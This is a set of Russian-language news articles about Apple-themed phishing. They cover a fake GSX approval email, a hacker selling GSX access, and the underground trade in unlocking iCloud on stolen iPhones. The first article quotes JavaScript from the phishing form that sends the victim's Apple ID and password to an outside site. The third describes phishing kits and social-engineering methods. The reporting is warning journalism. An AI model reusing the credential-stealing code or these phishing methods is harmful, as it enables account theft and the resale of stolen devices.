Внимание! Сегодня нам на почту пришло странное письмо… от Apple
На ваш почтовый ящик часто приходит спам? Он бывает разный: рекламный, с просьбой о помощи каким-то неведомым африканским товарищам, попавшим в сложную финансовую ситуацию, рассылка из сервисов… Сегодня на почтовый адрес нашей редакции пришло любопытное письмо… от Apple.
Вернее, так можно было подумать на первый взгляд, но при детальном рассмотрении содержимого письма стало сразу же понятно, что это фейковый почтовый адрес, цель которого — получение пароля и логина от Apple ID.
Само письмо выглядит следующим образом:
Из короткого сообщения мы узнали, что наша заявка в качестве участника программы Global Service Exchange (GSX) одобрена. Все, что нужно для активации — загрузить прилагающийся архив и ввести данные Apple ID в прилагающейся форме.
Самое интересно в том, что никакой заявки на участие в GSX ни один из членов нашей редакции не подавал.
GSX — это специализированный инструмент, который Apple выдает ограниченному кругу специалистов с целью осуществления сервисного обслуживания в рамках программы AppleCare. В работе используется iOS Diagnostics Apple, либо магазин-посредник, который позволяет связать с устройством клиента для получения необходимой информации.
Полученное письмо действительно выглядит правдоподобно: кратко, по делу, с подтверждением заявки и главной — адрес отправителя. Весьма реалистичный адрес [email protected] — в том же домене, что и Apple и без дополнительных приписок.
Внутри архива есть единственный файл в формате *.shtml. Открываем — обычная форма, которая полностью совпадает с оригиналом от Apple:
Разумеется, вводить Apple ID в подозрительное окно мы не стали.
В прикрепленном файле был обнаружен следующий код:
[jscript]
xmlhttp_rkchk.open(‘POST’,’http://nubetelstore.com/admin3667/123/checkapp2.php’,true);
xmlhttp_rkchk.setRequestHeader(‘Content-Type’,’application/x-www-form-urlencoded;charset=utf8′);
xmlhttp_rkchk.send(‘e=’+accountname+’&p=’+accountpassword);
[/jscript]
Он передает логин и пароль на сайт nubetelstore.com
В whois без палева указан email и телефон хостера. А фишинговый сайт до сих по не заблокирован. Мы сообщим им об этой проблеме.
Хозяева сайта скорее всего не знают о том, что он используется для воровства аккаунтов. Это новый PHP-сайт, беглый осмотр html-кода которого показал, что он возможно был написан людьми, которые не думали о безопасности и делали по принципу: «Чтобы работало». С большой вероятностью nublestore.com был взломан и используется мошенниками без ведома его владельцев.
Как выяснилось, полученное нами письмо — распространенный вариант фишинга, который от имени [email protected] действует с февраля месяца. Достаточно ввести данные своего аккаунта, как вы тут же попадаетесь на крючок злоумышленника и полностью теряете контроль на своим аккаунтом.
Будьте внимательны и никогда не вводите данные своей учетной записи в подозрительные формы. Фишинг — штука тонкая и адрес [email protected] выглядел весьма правдоподобно. Если бы кто-то из нашей большой команды сайта действительно подавал заявку на участие в Global Service Exchange, подвоха мы сразу могли бы и не заметить.
Источник
Хакер предлагает доступ к внутренним инструментам Apple
Хакер утверждает, что имеет доступ к системе Apple Global Service Exchange (GSX).
В течение последних нескольких лет хакеры и различного рода мошенники активно пытаются сыграть на популярности компании Apple будь то с целью вымогательства либо обмана ее клиентов. По данным издания ZDNet, некий хакер предлагает доступ к внутренним инструментам Apple, позволяющим получить данные учетных записей клиентов компании. На своей странице в Twitter он разместил несколько скриншотов, предположительно свидетельствующих о наличии доступа к системе Apple Global Service Exchange (GSX), использующейся сотрудниками компании для обработки пользовательских заявок на ремонт и послепродажной поддержки.
Журналисты связались с автором публикации с целью проверить правдивость его заявлений. Они предоставили хакеру серийный номер смарт-часов Apple Watch и спустя несколько минут получили скриншот с верной информацией о модели, серии и типе устройства. Помимо данной информации, скриншот не содержал других сведений. Хакер также отказался предоставить информацию из учетной записи, связанной с гаджетом, несмотря на заявления в своем профиле.
На ломаном английском хакер рассказал, что получил учетные данные для системы Apple с помощью «частного эксплоита», и ежедневно продает доступ к ней по меньшей мере 20 пользователям. Правда, никаких доказательств своим словам он не предоставил.
По словам источника в компании Apple, речь идет о «тестовой версии» инструмента GSX, использующейся только для разработки. Каким образом хакеру удалось получить доступ к системе в настоящее время неясно.
Напомним, в начале февраля нынешнего года на GitHub был опубликован исходный код загрузчика iOS – iBoot. Хотя юристы Apple позаботились об его оперативном удалении из открытого доступа, в конце того же месяца группировка Dark-Liberty Team снова разместила его на сайте iBoot Source Code Leak – Reloaded, доступном только через Tor.
Источник
Как хакеры и мошенники добираются до iCloud на заблокированных iPhone
Предисловие
Весной 2017 года подросток подошел к женщине, покидающей метро в северо-восточном Вашингтоне, округ Колумбия, и применил к ней удушающий прием: « Молчи », — сказал он. И « удали свой iCloud ». Затем он схватил ее iPhone 6S и убежал.
В прошлом месяце в Филадельфии было множество подобных грабежей. В каждом из этих ограблений преступник якобы держал жертву под дулом пистолета, требуя чтобы те достали свой iPhone, и отключили функцию «Найти iPhone» и выйти из учетной записи iCloud.
В 2013 году Apple представила функцию безопасности, предназначенную для того, чтобы сделать смартфоны менее ценными объектами для потенциальных воров. iPhone можно связать только с одной единственной учетной записью iCloud. Это означает, что для того, чтобы продать его кому-то другому (или чтобы украденный телефон использовался кем-то новым), эту учетную запись необходимо полностью удалить из телефона. Украденный iPhone, который все еще подключен к учетной записи iCloud первоначального владельца, бесполезен для личного использования как и для перепродажи (если только вы не разобрали его по частям для продажи), потому что в любой момент первоначальный владелец может удаленно заблокировать устройство и найти его местоположение с помощью приложения «Найти iPhone».
Кроме того, без пароля владельца учетная запись не может быть отвязана от телефона, а устройство не может быть сброшено до заводских настроек. Эта функция безопасности как раз и объясняет нам то, почему некоторые грабители требуют пароли учетных записей от своих жертв.
Функция безопасности iCloud, вероятно, сократила число украденных iPhone, но предприимчивые преступники нашли способы удалять учетную запись iCloud для перепродажи устройств. Для этого они обманывают первоначальных владельцев телефона или сотрудников в магазинах Apple Store, которые имеют возможность снимать блокировку iCloud. Воры, кодеры и хакеры участвуют в подпольной индустрии, предназначенной для удаления учетных записей пользователей iCloud из телефонов, чтобы затем смартфоны можно было перепродать.
Грубо говоря, мошенники отвязывают аккаунт настоящего владельца чтобы сделать телефон «новым».
Ситуация осложняется тем, что не все телефоны с заблокированным iCloud являются украденными устройствами — некоторые из них являются телефонами, которые возвращаются телекоммуникационным компаниям в рамках программ по обновлению и страхованию телефонов. Большое количество законно полученных iPhone с заблокированным iCloud помогает снабжать независимую индустрию ремонта телефонов запасными частями, которые нельзя получить напрямую от Apple. Но, конечно же, ремонтные организации знают, что разблокированный смратфон стоит дороже заблокированного, поэтому некоторые из них сами ушли в хакерское подполье, чтобы стать клиентами нелегальных компаний по разблокировке iCloud.
«Разблокировка» iCloud
На практике «разблокировка iCloud», как ее часто называют, представляет собой схему, которая включает в себя сложную цепочку из различных мошенников и киберпреступников. В схеме используют поддельные квитанции и счета, чтобы заставить сотрудников Apple поверить, что они являются законным владельцем телефона.Преступники используют базы данных для поиска информации по владельцам и задействуют социальную инженерию в магазинах Apple Store. В продаже есть даже специальные комплекты для фишинга , предназначенные для кражи паролей iCloud первоначального владельца телефона.
Функции безопасности
Существуют три способа удалить учетную запись iCloud с iPhone:
- Ввести пароль от iCloud первоначального владельца, который хакер может получить с помощью фишинга.
- Продавец в магазине Apple Store может разблокировать учетную запись iCloud. Мошенники могут заставить менеджеров снять блокировку устройства, которое им не принадлежит.
- Процессор iPhone можно извлечь из логической платы и перепрограммировать, чтобы создать по сути «новое» устройство (это очень трудоемкое и редко проводимое мероприятие. Обычно это делается в китайских лабораториях по восстановлению смартфонов,и включает кражу «чистого» идентификационного номера телефона — IMEI.)
Каждый из этих методов используется для разблокировки устройств и их перепродажи, однако большая часть — гораздо прозаичнее: обычное воровство.
«Не каждый телефон с заблокированным iCloud является украденным устройством», — сказал RootJunky, инструктор Phonlab , компании, которая обучает магазины по ремонту смартфонов по вопросам, связанным с программным обеспечением. «Но каждый метод удаления iCloud связан с незаконной деятельностью».
Когда у воров связаны руки
iPhone — удобная цель для воров, потому что они стоят сотни долларов, их количество всегда в изобилии, их легко носить и прятать. Но воры могут столкнуться с несколькими техническими препятствиями, как только они похитят телефон.
Многие владельцы используют функцию «Найти iPhone», которая позволяет пользователю зайти на сайт Apple и увидеть точное местоположение своего смартфона на карте, а также удаленно его заблокировать, что значительно затруднит его перепродажу (да и стоить такой аппарат будет намного дешевле, чем разблокированный смартфон с заводскими настройками). Хотя сотрудники правоохранительных органов не всегда могут действовать в соответствии с этой информацией, приложение «Найти iPhone» способствовала неоднократным арестам телефонных воров. Блокировка активации, связанная функция, позволяет стереть все данные устройства, а затем использовать или повторно активировать его только после ввода пин-кода смартфона владельца или его пароля iCloud.
«Каждый метод удаления iCloud связан с незаконной деятельностью»
Чтобы было понятно, «блокировка iCloud» и пароль устройства — это две разные вещи. Пин-код iPhone разблокирует экран устройства, а пароль iCloud можно использовать для удаления таких функций, как «Найти iPhone», «Блокировка активации» и для привязки телефона к новой учетной записи Apple, что очень важно при перепродаже телефона.
На eBay и других оптовых сайтах существует множество лотов с телефонами, которые выставляются на продажу с подписью «заблокирован iCloud», «на запчасти» и подобных. Хотя некоторые из этих телефонов почти наверняка украдены, многие — нет. По словам трех профессионалов, занимающихся независимым ремонтом и восстановлением iPhone, подержанные смартфоны, в том числе некоторые устройства с заблокированным iCloud, продаются оптом на частных «аукционах операторов», где такие компании, как T-Mobile, Verizon, Sprint, AT&T и страховщики и поставщики сотовых телефонов продают свои избыточные запасы (часто через сторонние процессинговые компании.)
Когда владелец смартфона возвращает его провайдеру сотовой связи в рамках обновления устройства или страхового возмещения, сотрудник, который его забирает, обучен просить клиента удалить устройство из iCloud, говорят представители AT&T и T-Mobile. Но это происходит не всегда, а значит у операторов и страховых компаний скапливаются смартфоны с заблокированным iCloud.
Пока никто не может точно сказать, могут ли какие-либо операторы на данный момент самостоятельно удалять блокировку iCloud с iPhone или сама Apple помогает операторам делать это в массовом порядке. AT&T и T-Mobile проигнорировали конкретные вопросы о том, имеют ли они возможность разблокировать телефоны, а Sprint и Verizon не ответили на запрос о комментариях. Согласно двум источникам в сообществе по ремонту iPhone, которые купили телефоны с заблокированными учетными записями с аукционов по телекоммуникациям, операторы мобильной связи хотят разблокировать телефоны, но у Apple, скорее всего, нет никакого стимула для подстегивания вторичного рынка iPhone.
« Операторы продают тонну заблокированных устройств », — рассказал изданию Motherboard один из людей такого сообщества, который покупает телефоны на частных аукционах. Журналисты согласились сохранить его анонимность, поскольку не хотели потерять доступ к аукционам частных перевозчиков.
Как только устройства с заблокированным iCloud вернутся на рынок, независимо от того, получены ли они по закону или украдены, их нужно либо разобрать на части, либо как-то разблокировать.
И тут в дело вступают хакеры.
Фишинг в облаках
« В какую страну? » — один из реселлеров планшетов iPad написал в приватной чат-группе хакеров iCloud приложения Telegram, к которому журналисты Motherboard получили доступ. Сообщение пришло вместе с изображением устройства с надписью « Этот iPad был потерян. Пожалуйста, перезвоните мне».
Каждый день участники этого группового чата, состоящего из 100 человек, делятся советами о том, как обмануть жертв в передаче паролей iCloud, загружают фотографии их успешных разблокировок и делиться стикерами на тему Apple. Именно здесь многие потерянные, украденные или иным образом заблокированные iPhone оказываются перед тем, как хакеры разблокируют их, и устройства снова будут продаваться. Эта группа — почти постоянный поток телефонов людей и сообщений, оставленных на экране блокировки различных смартфонов от Apple.
«Этот телефон украден. Пожалуйста, передайте об этом полиции», — гласит сообщение, показанное на одном из iPhone, в чате Telegram.
IPhone, iPad, а иногда и Apple Watch поступают со всего мира: США, Великобритании, Европы, Южной Америки, Юго-Восточной Азии и Ближнего Востока. У некоторых хакеров есть десятки целей за один раз, согласно скриншотам, опубликованных в групповом чате. Хакерские группировки глобальны. Один из них сказал в чате, что они на Филиппинах, а разработчик хакерских инструментов указал, что они базируются в Восточной Европе.
При попытке перепродать украденный или утерянный iPhone, сначала человек занимающийся разблокировкой должен понять, что у них за телефон. Включена ли функция «Найти iPhone»? Владелец уже сообщил о краже в Apple или еще нет?
Чтобы ответить на эти вопросы, хакеры часто используют доступ к инструменту, который предоставляет информацию по телефонам. Журналисты Matherboard не смогли подтвердить точную базу данных, которую используют мошенники, но проверили несколько онлайн-сервисов, которые возвращали точную информацию об устройстве материнской платы, включая информацию о том, была ли активирована функция «Найти iPhone» и был ли он зарегистрирован как утерянный, украденный или остался «чистым».
Если кто-то, пытающийся разблокировать телефон, не хочет заморачиваться с доступом к базе, он также может бесплатно воспользоваться сайтом, который предоставляет информацию об устройствах Apple. Один из таких сайтов, iFreeiCloud.co.uk, может предоставлять подобные отчеты. Например, сообщалось ли о том, что смартфон украден или нет. Обработка каждого такого запроса стоит символических 10 центов за каждый.
Некоторые хакеры в группе утверждают, что имеют доступ к Apple Global Service Exchange (GSX) – базе данных восстановления, используемой компанией и некоторыми сторонними авторизованными поставщиками услуг Apple, а также торговыми посредниками.
«GSX — это веб-сайт Global Service Exchange, используемый Розничной торговлей и авторизованными сервисными центрами Apple для доступа к техническим ресурсам — от руководств по обслуживанию техники компании и инструментов устранения неполадок, до обучения техников по обслуживанию» , — говорится во внутреннем документе Apple , описывающем сервис, полученным журналистами Motherboard.
Различные сотрудники Apple Store, такие как ребята из Genius Bar, автоматически получают доступ к GSX, говорится в другом внутреннем документе Apple.
Издание Motherboard нашло в Интернете несколько рекламных объявлений, предлагающих доступ к учетным записям GSX и так или иначе связанной с ними информации. Одно из объявлений было на форуме посвященном биткойнам. Другие подавались в виде онлайн-рекламы, в которой просили потенциальных клиентов отправить им электронное письмо.
Журналисты издания обменивалась e-mail`ами с человеком, утверждающим, что продает учетные записи GSX за 199 долларов за штуку. Также несколько пользователей Twitter тоже утверждали, что продают доступ к сервису (Однако некоторые люди, рекламирующие учетные записи GSX в Твиттере, кажутся мошенниками.) Кроме того, находились и сообщения на форумах от законных владельцев учетных записей GSX, в которых говорилось, что они получили фишинговые электронные сообщения, предназначенные для кражи их данных для входа в GSX.
Реселлеры черного рынка iPhone используют специальные фишинговые комплекты iCloud; наборы инструментов, предназначенных для того, чтобы заставить жертву передать свой пароль Apple ID после кражи телефона. Эти наборы специально разработаны, чтобы быть простыми в использовании, значительно снижая барьер входа для воров и людей занимающихся разблокировкой iPhone.
Давид Ферро, независимый исследователь безопасности, следивший за фишинговым сообществом iCloud, рассказал журналистам Motherboard, что AppleKit и ProKit — наборы для новичков. За несколько месяцев Ферро поделился десятками примеров фишинговых наборов iCloud, включая скриншоты со списками сотен фишинговых целей. Как отмечается в сообщении Trend Micro в сфере кибербезопасности, AppleKit также поддерживает iPad, Mac и Apple Watch.
В то время как хакер может использовать более общие фишинговые комплекты для различных целей, например, для кражи банковских реквизитов, учетных данных электронной почты или учетных записей в Интернете в целом, эти наборы специально предназначены для фишинга учетных записей iCloud. Подобные наборы поставляются с шаблонами, разработанными для обмана жертвы, когда был найден (украден) их iPhone. Они позволяют хакеру отправлять SMS-сообщения, которые, как кажется жертве, приходят от Apple, что может заставить пользователя удалить свои учетные данные iCloud с устройства.
Такие комплекты отслеживают список целей хакера, предоставляют уведомления об успешных фишинг-атаках, а некоторые не требуют почти никаких технических настроек. Основные принципы изложены в видео-уроках о том, как их использовать.
Как только хакеры получают учетные данные для входа в iCloud, они просто вводят их в iPhone, что делает его полностью функциональным устройством, которое можно перепродать или добавить в него новую учетную запись.
BlackViirus, разработчик ProKit, рассказал журналистам в онлайн-чате, что его продукт стоит 75 долларов, и он использует сеть посредников для дальнейшего распространения комплекта для фишинга. BlackViirus утверждает, что имеет более 1500 клиентов .
Фишинг — это масштабная операция, некоторые пользователи таких комплектов утверждают, что обрабатывают массовые заказы. Они часто принимают платежи с помощью PayPal или Skrill –другого сервиса денежных переводов.
Некоторые из хакеров, использующих эти фишинговые комплекты, не обязательно являются самыми яркими знаменитыми хакерами в мире. Мустафа Отман, создатель AppleKit, жестко запрограммировал пароль в своем наборе для фишинга, что означает, что любой может просто извлечь его из кода и войти в систему как администратор. Это дает возможность увидеть, что задумал каждый из его клиентов. Ферро, независимый исследователь безопасности, использовал этот метод, чтобы войти в панель AppleKit и предоставил скриншоты со списками жертв.
Источник